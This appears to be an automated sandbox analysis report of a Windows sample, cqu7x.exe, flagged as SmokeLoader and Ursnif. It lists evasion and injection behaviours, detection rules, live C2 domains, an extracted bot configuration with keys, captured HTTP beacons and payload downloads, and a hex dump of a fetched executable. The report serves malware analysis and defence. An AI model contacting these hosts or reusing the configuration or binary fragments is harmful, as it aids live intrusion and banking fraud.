Windows Analysis Report
cqu7x.exe

Overview

General Information

Sample Name: cqu7x.exe
Analysis ID: 743908
MD5: e449924b8aa04fa2e032511cf86d2482
SHA1: bc9c00e0841a84fbc45d9ef36422eac3590b590f
SHA256: b9fd7622c3fcfdd6eb9b2cb917a3cb64eb35c61221de4866303ca88d828d5bed
Infos:

Detection

Ursnif, SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected Ursnif
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Writes or reads registry keys via WMI
Found API chain indicative of debugger detection
Machine Learning detection for sample
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Found evasive API chain (may stop execution after checking system information)
Deletes itself after installation
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Writes registry values via WMI
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
PE file contains executable resources (Code or Archives)
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: cqu7x.exe ReversingLabs: Detection: 92%
Source: cqu7x.exe Metadefender: Detection: 40% Perma Link
Antivirus detection for URL or domain
Source: http://dindunketagestan.ru/ Avira URL Cloud: Label: malware
Source: http://klenoviycdesss.ru/ Avira URL Cloud: Label: malware
Source: http://goalichkindomik.ru/ Avira URL Cloud: Label: malware
Source: http://pali44unkis9.ru/ Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen7
Source: C:\Users\user\AppData\Roaming\vcivdjd Avira: detection malicious, Label: TR/AD.GenSHCode.nsnoi
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\3196.exe ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe ReversingLabs: Detection: 88%
Source: C:\Users\user\AppData\Roaming\vcivdjd ReversingLabs: Detection: 92%
Source: C:\Users\user\AppData\Roaming\vcivdjd Metadefender: Detection: 40% Perma Link
Machine Learning detection for sample
Source: cqu7x.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\3196.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\vcivdjd Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 6.2.loader_250246_15072022_2203_31102022.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen7
Source: 5.2.3196.exe.2aed320.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 6.0.loader_250246_15072022_2203_31102022.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen7
Source: 4.0.vcivdjd.400000.0.unpack Avira: Label: TR/AD.GenSHCode.nsnoi
Source: 0.0.cqu7x.exe.400000.0.unpack Avira: Label: TR/AD.GenSHCode.nsnoi
Source: 5.2.3196.exe.2ae3f04.0.unpack Avira: Label: TR/Patched.Ren.Gen4
Source: 00000000.00000002.415776182.0000000002381000.00000004.10000000.00040000.00000000.sdmp Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://klenoviycdesss.ru/", "http://pali44unkis9.ru/", "http://goalichkindomik.ru/"]}
Source: 6.2.loader_250246_15072022_2203_31102022.exe.d394a0.2.raw.unpack Malware Configuration Extractor: Ursnif {"RSA Public Key": "srPNiXjpv7wJ4ljQO2Cz+d/1vQBpygFC+rxzA2ZfCG08A38OH/syLbdWurZUpeEopKx867ngBKiBCYKNKuEDO5TdpRu4icgODSbD5/RNGSb+8EPLgpbbUWScIJhsIrETgOb66YOp+zXevxRZPgG4/Be11WPFR9E0BCGig1wWjBqPcgDkZrDVTybbNAiB7WBjbG26Z+ggDYdJguf/gj1lSfHj+pVn5ZXxO1AaPWJ6kcSiCUWT5R2TFH550ig+/ppqRx4AuhLwYOZC0vaWmmGmwIQY5kixhB7e1gjnjAY57OHcecvOgqGpesvGL4Tg09kRioFbkNzrDQj66EB4YZ2LyeusAf9F2LccLOvlZsjgV04=", "c2_domain": ["telemetry.skype.com", "spotuoyoliusdd.ru", "sspotuoyobermanoba4.ru", "gdospotuoyluiprada8.ru", "messpotuoyoosd.ru", "klspotuoyka93hhu8.ru", "chespotuoynedr.ru"], "botnet": "15072022", "server": "50", "serpent_key": "NAyL8tmsHrJ4ZWxJ", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe Code function: 6_2_004347E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 6_2_004347E5
Uses 32bit PE files
Source: cqu7x.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\cqu7x.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: Binary string: C:\tayaho\fijopeyado\yitopiwozobog\zolusay pe.pdb8hC source: cqu7x.exe, vcivdjd.1.dr
Source: Binary string: C:\tayaho\fijopeyado\yitopiwozobog\zolusay pe.pdb source: cqu7x.exe, vcivdjd.1.dr

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: dindunketagestan.ru
Source: C:\Windows\explorer.exe Domain query: kukaryka.ru
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49695 -> 37.140.192.158:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://klenoviycdesss.ru/
Source: Malware configuration extractor URLs: http://pali44unkis9.ru/
Source: Malware configuration extractor URLs: http://goalichkindomik.ru/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: HostingvpsvilleruRU HostingvpsvilleruRU
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.2Date: Fri, 11 Nov 2022 11:22:52 GMTContent-Type: application/x-msdos-programContent-Length: 177152Connection: keep-aliveLast-Modified: Sun, 06 Nov 2022 19:06:18 GMTETag: "2b400-5ecd200734c2c"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 2c 79 63 63 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 08 01 00 00 aa 01 00 00 00 00 00 c1 26 01 00 00 20 00 00 00 40 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 03 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 77 26 01 00 4a 00 00 00 00 40 01 00 e4 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c7 06 01 00 00 20 00 00 00 08 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e4 a7 01 00 00 40 01 00 00 a8 01 00 00 0a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 03 00 00 02 00 00 00 b2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a7 26 01 00 00 00 00 00 48 00 00 00 02 00 05 00 c0 3f 00 00 64 4b 00 00 0b 00 00 00 09 00 00 06 24 8b 00 00 53 9b 00 00 40 3f 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 17 2a 00 0a 17 2a 00 13 30 03 00 82 00 00 00 01 00 00 11 2b 4f 38 50 00 00 00 16 38 50 00 00 00 2b 2a 7e 37 00 00 04 2b 4d 2b 4e 2b 4f 2b 57 2b 5b 1f 30 25 2c 09 32 09 2b 58 16 2d f0 1f 39 31 04 16 0b de 1d 09 16 2d f9 17 58 0d 09 7e 39 00 00 04 08 28 9d 00 00 06 17 2c e4 32 c5 17 25 2c ba 2a 07 2a 02 38 ab ff ff ff 0c 38 aa ff ff ff 0d 38 aa ff ff ff 08 2b b0 09 2b af 28 9a 00 00 06 38 a7 ff ff ff 0a 38 a3 ff ff ff 06 38 9f ff ff ff 06 2b a5 00 00 13 30 03 00 82 00 00 00 01 00 00 11 2b 4f 38 50 00 00 00 16 38 50 00 00 00 2b 2a 7e 37 00 00 04 2b 4d 2b 4e 2b 4f 2b 57 2b 5b 1f 30 25 2c 09 32 09 2b 58 16 2d f0 1f 39 31 04 16 0b de 1d 09 16 2d f9 17 58 0d 09 7e 39 00 00 04 08 28 9d 00 00 06 17 2c e4 32 c5 17 25 2c ba 2a 07 2a 02 38 ab ff ff ff 0c 38 aa ff ff ff 0d 38 aa ff ff ff 08 2b b0 09 2b af 28 9a 00 00 06 38 a7 ff ff ff 0a 38 a3 ff ff ff 06 38 9f ff ff ff 06 2b a5 00 00 13 30 03 00 82 00 00 00 01 00 00 11 2b 4f 38 50 00 00 00 16 38
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rocmdbvx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 242Host: dindunketagestan.ru
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://froxojju.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 287Host: dindunketagestan.ru
Source: global traffic HTTP traffic detected: GET /iTunesHelper.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: kukaryka.ru
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://quvycqdb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 243Host: dindunketagestan.ru
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Nov 2022 11:22:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.28Data Raw: 37 0d 0a 03 00 00 00 6f 77 a2 0d 0a 30 0d 0a 0d 0a Data Ascii: 7ow0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Nov 2022 11:22:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.28Data Raw: 32 66 0d 0a 00 00 c7 1f f0 9f 73 69 1b 62 99 0f 82 1d ee d6 67 70 f6 13 5b f9 f7 14 59 8f 9d 94 11 86 35 da 31 f2 b3 54 89 df 14 59 f4 30 77 7e 19 f3 d3 0d 0a 30 0d 0a 0d 0a Data Ascii: 2fsibgp[Y51TY0w~0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Nov 2022 11:22:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.28Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: loader_250246_15072022_2203_31102022.exe, 00000006.00000002.586272240.0000000000683000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://telemetry.skype.com/drew/
Source: explorer.exe, 00000001.00000000.351811387.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.385722347.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.412288858.0000000008260000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: unknown HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rocmdbvx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 242Host: dindunketagestan.ru
Source: unknown DNS traffic detected: queries for: dindunketagestan.ru
Source: global traffic HTTP traffic detected: GET /iTunesHelper.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: kukaryka.ru

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Yara detected Ursnif
Source: Yara match File source: 6.2.loader_250246_15072022_2203_31102022.exe.d394a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.loader_250246_15072022_2203_31102022.exe.430000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.586624507.0000000000D39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Yara detected SmokeLoader
Source: Yara match File source: 4.2.vcivdjd.4d0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.cqu7x.exe.520000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vcivdjd.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.vcivdjd.4e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.cqu7x.exe.510e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.cqu7x.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.415776182.0000000002381000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.415123167.0000000000520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.459393089.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.471472153.00000000004E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.471974631.0000000000911000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.401881839.0000000002B21000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.322194744.0000000000520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Creates a DirectInput object (often for capturing keystrokes)
Source: loader_250246_15072022_2203_31102022.exe, 00000006.00000002.586083420.000000000064A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud
barindex
Yara detected Ursnif
Source: Yara match File source: 6.2.loader_250246_15072022_2203_31102022.exe.d394a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.loader_250246_15072022_2203_31102022.exe.430000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.586624507.0000000000D39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe Code function: 6_2_004347E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 6_2_004347E5

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000006.00000002.586811866.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000006.00000002.586811866.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000002.415776182.0000000002381000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.415123167.0000000000520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.471661867.0000000000513000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.415096817.0000000000510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000004.00000002.471455998.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000004.00000002.471472153.00000000004E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.471974631.0000000000911000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.415328456.0000000000553000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000001.00000000.401881839.0000000002B21000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: Process Memory Space: loader_250246_15072022_2203_31102022.exe PID: 3524, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: Process Memory Space: loader_250246_15072022_2203_31102022.exe PID: 3524, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Writes or reads registry keys via WMI
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Uses 32bit PE files
Source: cqu7x.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 00000006.00000002.586811866.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000006.00000002.586811866.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000002.415776182.0000000002381000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.415123167.0000000000520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.471661867.0000000000513000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.415096817.0000000000510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000004.00000002.471455998.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000004.00000002.471472153.00000000004E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.471974631.0000000000911000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.415328456.0000000000553000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000001.00000000.401881839.0000000002B21000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
